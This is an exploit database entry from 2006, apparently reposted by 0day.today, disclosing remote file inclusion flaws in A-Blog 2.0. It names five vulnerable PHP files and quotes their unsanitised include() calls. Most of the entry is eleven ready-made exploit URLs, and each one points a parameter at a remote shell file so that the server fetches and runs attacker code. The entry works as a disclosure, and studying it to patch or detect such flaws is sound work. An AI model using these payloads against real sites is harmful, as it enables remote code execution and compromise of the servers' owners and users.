A-Blog 2.0 Multiple Remote File Include Vulnerabilities

2006-09-27T00:00:00
ID 1337DAY-ID-897
Type zdt
Reporter v1per-haCker
Modified 2006-09-27T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =======================================================
A-Blog 2.0 Multiple Remote File Include Vulnerabilities
=======================================================


#==============================================================================================
#A-Blog v2.0 Remote File Include
#===============================================================================================
#
#Critical Level : Dangerous
#
#A-Blog
#Version : v2.0
#
#================================================================================================
#Bug in :
#/navigation/links.php
#/navigation/search.php
#/navigation/donation.php
#/navigation/latestnews.php
#/sources/myaccount.php
#
#================================================================================================
#Vlu Code :
#include("$navigation_start")
#include("$navigation_middle")
#include("$navigation_end")
#include("$open_box")
#include("$middle_box")
#include("$close_box")
#================================================================================================
#
#Exploit :
#
#http://localhost/A-Blog/sources/myaccount.php?open_box=http://shell.txt?
#http://localhost/A-Blog/sources/myaccount.php?middle_box=http://shell.txt?
#http://localhost/A-Blog/sources/myaccount.php?close_box=http://shell.txt?
#http://localhost/A-Blog/navigation/search.php?navigation_end=http://shell.txt?
#http://localhost/A-Blog/navigation/donation.php?navigation_start=http://shell.txt?
#http://localhost/A-Blog/navigation/donation.php?navigation_middle=http://shell.txt?
#http://localhost/A-Blog/navigation/donation.php?navigation_end=http://shell.txt?
#http://localhost/A-Blog/navigation/latestnews.php?navigation_start=http://shell.txt?
#http://localhost/A-Blog/navigation/latestnews.php?navigation_middle=http://shell.txt?
#http://localhost/A-Blog/navigation/links.php?navigation_start=http://shell.txt?
#http://localhost/A-Blog/navigation/links.php?navigation_middle=http://shell.txt?

#================================================================================================
#Discoverd By : v1per-haCker
#XP10_hackEr Team
#Greetz to : abu_shahad ; RooT-shilL ; hetler_jeddah ; BooB11 ; FaTaL ; ThE-WoLf-KsA ; mohandko ; fooooz ; maVen
#and all members in XP10_hackEr Team
==================================================================================================



#  0day.today [2018-04-09]  #